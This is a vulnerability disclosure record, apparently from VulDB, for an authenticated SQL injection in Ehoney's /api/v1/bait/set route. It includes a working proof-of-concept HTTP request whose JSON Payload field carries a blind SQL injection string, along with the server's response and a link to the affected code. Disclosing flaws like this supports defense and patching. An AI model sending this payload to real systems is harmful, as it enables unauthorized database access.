| Title | Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/bait/set route |
|---|
| Description | repo:
https://github.com/seccome/Ehoney
## requests
POST /api/v1/bait/set HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo
Content-Length: 84
Content-Type: application/json
Host: x.x.x.x:8080
{
"Payload": "' and length(database())=13 #",
"PageNumber": 1,
"PageSize": 1
}
## response
{
"code": 200,
"msg": "ok",
"data": {
"Count": 2,
"List": [
{
"ID": 1,
"BaitName": "history",
"FileName": "",
"BaitType": "HISTORY",
"BaitData": "水电费收到发",
"Creator": "admin123",
"CreateTime": "2021-09-02 14:50:28"
},
{
"ID": 2,
"BaitName": "passwordfile",
"FileName": "password",
"BaitType": "FILE",
"BaitData": "",
"Creator": "admin",
"CreateTime": "2021-09-02 18:02:34"
}
]
}
}
## affected code
https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/models/bait.go#L58
|
|---|
| User | Anonymous User |
|---|
| Submission | 10/26/2022 03:49 (3 years ago) |
|---|
| Moderation | 10/28/2022 07:30 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 212414 [seccome Ehoney /api/v1/bait/set Payload sql injection] |
|---|
| Points | 17 |
|---|